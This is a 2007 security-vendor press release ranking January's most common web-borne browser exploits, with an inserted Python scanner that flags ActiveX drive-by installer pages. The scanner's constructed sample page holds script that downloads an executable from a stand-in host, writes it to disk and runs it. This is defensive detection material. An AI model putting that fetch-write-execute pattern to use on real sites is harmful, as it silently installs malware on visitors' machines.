Exploit Prevention Labs

EXPLOIT PREVENTION LABS RELEASES JANUARY EXPLOIT PREVALENCE SURVEY

“Q406 Roll-up” Exploit Package Continues to Dominate with 61.23 Percent of all Encounters

February 5, 2007 – Atlanta, GA – Exploit Prevention Labs (http://www.explabs.com), a leading developer of safe surfing software that protects against phishing, social engineering and other web-based exploits, today released the results of its January 2007 Exploit Prevalence Survey™. Now in its ninth month, the Exploit Prevalence Survey is the industry’s only survey to use real-world data to definitively measure the most widespread web-borne exploits. Results are derived from automated reports submitted by users of Exploit Prevention Labs’ LinkScanner family of safe surfing applications, combined with data collected from all levels of the company’s multi-faceted research network.

Roger Thompson, CTO of Exploit Prevention Labs and author of the monthly Exploit Prevalence Survey, noted steady activity among cybercriminals in January. For the second consecutive month, January’s number one exploit was an exploit package dubbed the “Q406 Roll-up” by Thompson. The package accounted for 61.23 percent of all exploit encounters, down slightly from December’s 70.9 percent. The package consists of updated versions of exploits issued during the fourth quarter of 2006.

According to Thompson, the most common exploits in the package are setSlice, VML and XML, all of which were derived from proof-of-concepts released by HD Moore during his Month of Browser Bugs (July 2006). Also included in the package is the IE COM CreateObject exploit (MS06-042), originally released as a proof of concept in August 2006, which occupied November’s number one ranking with 30.45 percent of all occurrences.

“The entire package is heavily encrypted, but it appears there are around a dozen individual exploits included,” said Thompson. “The continued dominance of the Q406 Roll-up shows that the bad guys are able to tweak their existing exploits and maintain relevancy in the market while they continue to develop new exploits, which can take months to design.”

The second most common exploit in January was CreateTextRange (CVE-2006-1359), which came in with 8.45 percent of all occurrences. CreateTextRange, a memory-corruption attack affecting Internet Explorer, has made several appearances in the Exploit Prevalence Survey since the survey began nine months ago.

“CreateTextRange has been a very stable exploit for the bad guys over the past few months,” Thompson noted. “It still has the ability to infect computers even though it was released back in March 2006 and a patch was issued quickly the following month.”

January’s big news was the long-awaited release of Microsoft’s new operating system, Windows Vista, which cybercriminals have already started targeting. One Vista zero-day exploit has reportedly already been auctioned off for $50,000. “The next few weeks will be interesting,” Thompson said. “We will be watching very closely to see if the bad guys have anything up their sleeves. Although Vista doesn’t yet have many users, I think cyber criminals will still be motivated to develop exploits for it quickly, kind of like a virtual poke in the eye. Vista users should continue to take normal precautions, such as patching regularly and using exploit-specific protection like LinkScanner.”

Exploit Prevalence Results for the Month of January 2007

The following is a summary of the top five most-reported web exploits for January 2007:

Each entry lists the exploit, its rank in the previous month (December 2006), its share of all exploit encounters (with December’s share in parentheses), and a short description.

Q406 Roll-up package
Rank last month: 1 (the package was also the top-ranked exploit in December)
Percent of overall occurrences: 61.23 percent (70.9 previous)
Description: Comprised of up to a dozen exploits, of which the most common are setSlice, VML, XML and IE COM CreateObject (MS06-042). The package is usually heavily obfuscated, which makes it difficult to single out the individual exploits.

CreateTextRange (CVE-2006-1359)
Rank last month: 3
Percent of overall occurrences: 8.45 percent (4.5 previous)
Description: Released March 2006. A memory-corruption attack affecting Internet Explorer that enables the execution of arbitrary code, usually a downloader: a program whose job is to fetch and install another program such as a rootkit or a keylogger. Patched by Microsoft in April 2006 (MS06-013), but it remains a credible threat.

MDAC
Rank last month: 2
Percent of overall occurrences: 7.10 percent (5.70 previous)
Description: Although technically not a single exploit, “MDAC” refers to a creative method of using certain ActiveX controls in a context for which Microsoft did not originally intend them. Script on the web page instantiates ActiveX controls that can write a file to disk and then execute it, so merely visiting the page is enough to install a payload.

IE VML Overflow
Rank last month: 9
Percent of overall occurrences: 5.37 percent (1.20 previous)
Description: A buffer overflow in Internet Explorer’s Vector Markup Language (VML) handling (CVE-2006-4868) that allows execution of arbitrary code. Security researchers believe the exploit was released on the 13th or 14th of September 2006, right after Patch Tuesday on the 12th. It affects most versions of IE. Microsoft issued an out-of-cycle patch (MS06-055) on September 27.

WebAttacker
Rank last month: 6
Percent of overall occurrences: 5.18 percent (2.30 previous)
Description: WebAttacker is a Russian-built exploit kit, first introduced about two years ago. The kit currently launches five different exploits: the IE VML Overflow, MDAC, a Firefox exploit, CreateTextRange and an exploit for the Java Virtual Machine. Like a commercial software application, WebAttacker can be purchased online at underground hacker web sites for between $20 and $300, and requires minimal technical sophistication to use. It is updated every few months, just like legitimate commercial software, except that it is crimeware; the update incorporating the IE VML exploit was released on Exploit Wednesday (the day after Patch Tuesday) in September 2006.

Note: The numbers above do not add up to 100 percent because of the following lesser-reported exploits (January vs. December): Iframers launcher script (2.88% vs. 3.6%); IE COM CreateObject code (MS06-042) (2.05% vs. 0.5%); WMF (CVE-2005-2124) with known payload (2.50% vs. 2.70%); others (4.80%).
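The MDAC entry above describes the pattern a safe-surfing scanner has to spot: page script instantiating ActiveX controls that together can fetch a file, write it to disk and run it, while the roll-up packages hide that script behind obfuscation. The following static triage script is an added example written for this page; it is not Exploit Prevention Labs’ code and says nothing about how LinkScanner actually works. The sample pages are constructed, and the grouping of progids into download, file-write and execute capabilities is an assumption made for illustration, not a list taken from the survey.

```python
"""Static triage of saved web pages for ActiveX-based drive-by installer
patterns (added example; not Exploit Prevention Labs' or LinkScanner's code).

Assumptions: the progid groupings below are illustrative, and the sample
pages at the bottom are constructed, not captured from any real site.
"""
import re
from html.parser import HTMLParser

# Assumed capability groupings (lower-cased progids); illustrative, not exhaustive.
DOWNLOAD = {"msxml2.xmlhttp", "microsoft.xmlhttp", "msxml2.serverxmlhttp"}
FILE_WRITE = {"adodb.stream", "scripting.filesystemobject"}
EXECUTE = {"wscript.shell", "shell.application"}

# Matches new ActiveXObject("Prog.Id") and obj.CreateObject("Prog.Id", ...).
INSTANTIATE_RE = re.compile(
    r'(?:ActiveXObject|CreateObject)\s*\(\s*["\']([A-Za-z0-9._-]+)["\']', re.I)
# Constructs that typically hide the real script body from a static scanner.
OBFUSCATION_RE = re.compile(r'\b(?:unescape|String\.fromCharCode|eval)\s*\(')


class ScriptExtractor(HTMLParser):
    """Collects the raw text of every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag.lower() == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data


def extract_scripts(html):
    parser = ScriptExtractor()
    parser.feed(html)
    parser.close()
    return parser.scripts


def triage(html):
    """Classify one page: which controls its script instantiates, what those
    controls can do, and a verdict. A heavily obfuscated script with no
    visible progids is still flagged, since the scanner cannot see through it."""
    body = "\n".join(extract_scripts(html))
    progids = {m.group(1).lower() for m in INSTANTIATE_RE.finditer(body)}
    caps = {
        "download": bool(progids & DOWNLOAD),
        "file_write": bool(progids & FILE_WRITE),
        "execute": bool(progids & EXECUTE),
    }
    obfuscation_hits = len(OBFUSCATION_RE.findall(body))
    if caps["file_write"] and caps["execute"]:
        verdict = "drive-by-installer"      # writes a file to disk, then runs it
    elif any(caps.values()):
        verdict = "suspicious-activex"      # partial chain; worth a closer look
    elif obfuscation_hits >= 3:
        verdict = "obfuscated-script"       # progids hidden; decode offline
    else:
        verdict = "clean"
    return {"progids": sorted(progids), "capabilities": caps,
            "obfuscation_hits": obfuscation_hits, "verdict": verdict}


# Constructed sample pages (not captured from any real site).
BENIGN_PAGE = """<html><body><script>
var req = new XMLHttpRequest();
req.open("GET", "/news.json");
req.send();
</script></body></html>"""

INSTALLER_PAGE = """<html><body><script>
var http = new ActiveXObject("Msxml2.XMLHTTP");
http.open("GET", "http://example.invalid/dl.exe", false);
http.send();
var stream = new ActiveXObject("ADODB.Stream");
stream.Type = 1; stream.Open(); stream.Write(http.responseBody);
stream.SaveToFile("update.exe", 2);
new ActiveXObject("WScript.Shell").Run("update.exe");
</script></body></html>"""

OBFUSCATED_PAGE = """<html><body><script>
var p = "";
p += unescape("%75%6E%65%73%63%61%70%65");
p += String.fromCharCode(101, 118, 97, 108);
eval(p);
</script></body></html>"""

if __name__ == "__main__":
    for name, page in [("benign", BENIGN_PAGE), ("installer", INSTALLER_PAGE),
                       ("obfuscated", OBFUSCATED_PAGE)]:
        print(name, triage(page)["verdict"])
```

The verdict deliberately separates the full write-then-execute chain from a partial one, and treats a script that is mostly unescape/fromCharCode/eval with no visible progids as something to decode offline rather than pass as clean; that is the same limitation the survey notes for the obfuscated roll-up package.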

Note to media: Members of the media who would like to interview Roger Thompson about this survey may contact Tim Shisler of Dovetail Public Relations at 408-395-3600 or at xpl (at) dovetailpr (dot) com.

For additional background information on exploits and how to protect against them, visit Exploit Prevention Lab’s comprehensive Resource Center at http://www.explabs.com/about/resCenter/.

About the LinkScanner Family of Safe Surfing Software

Exploit Prevention Labs provides a complete family of safe surfing software to protect Internet users against malicious web sites, phishing, social engineering and other web-based exploits.

The LinkScanner family of safe surfing products includes LinkScanner Pro™, LinkScanner Lite™ and LinkScanner Online. LinkScanner Pro™ (free 15-day evaluation: http://www.explabs.com/downloads/LSP), a $29.95 safe surfing Windows application, provides real-time, automatic protection against malicious web sites, drive-by downloads and other crimeware exploits.

LinkScanner Lite (http://www.explabs.com/downloads/LSL) is a free application that provides Internet Explorer users with real-time scanning of Google, MSN and Yahoo search results for web-based threats, as well as on-demand scanning of individual links.

Both products run under Windows 2000, Windows XP, and Windows Vista.

LinkScanner Online, available at http://linkscanner.explabs.com, is a free real-time online URL scanning service that lets users know whether any individual site they intend to visit has been poisoned by an exploit distribution network. LinkScanner Online supports all major web browsers and is freely available for incorporation into third-party websites. Interested webmasters can request the code through Exploit Prevention Labs’ website at http://www.explabs.com/LinkScanner/MyLinkScanner/.

About Exploit Prevention Labs

Founded by information security veterans Bob Bales and Roger Thompson in 2005, Exploit Prevention Labs develops the LinkScanner family of safe surfing software and services. LinkScanner Pro, LinkScanner Lite and LinkScanner Online provide patent-pending protection against malicious web sites and web-based exploits during the critical risk window between the announcement of a security vulnerability and the provision of a patch by the vendor. A Software Development Kit (SDK) is also available to enable third party vendors to incorporate Exploit Prevention Labs’ technology in their own applications and services. More information about Exploit Prevention Labs and LinkScanner may be found on the company’s website at http://www.explabs.com.

###

Media Contact:
Tim Shisler/Julie Parayno
Dovetail Public Relations
408.395.3600
xpl at dovetailpr.com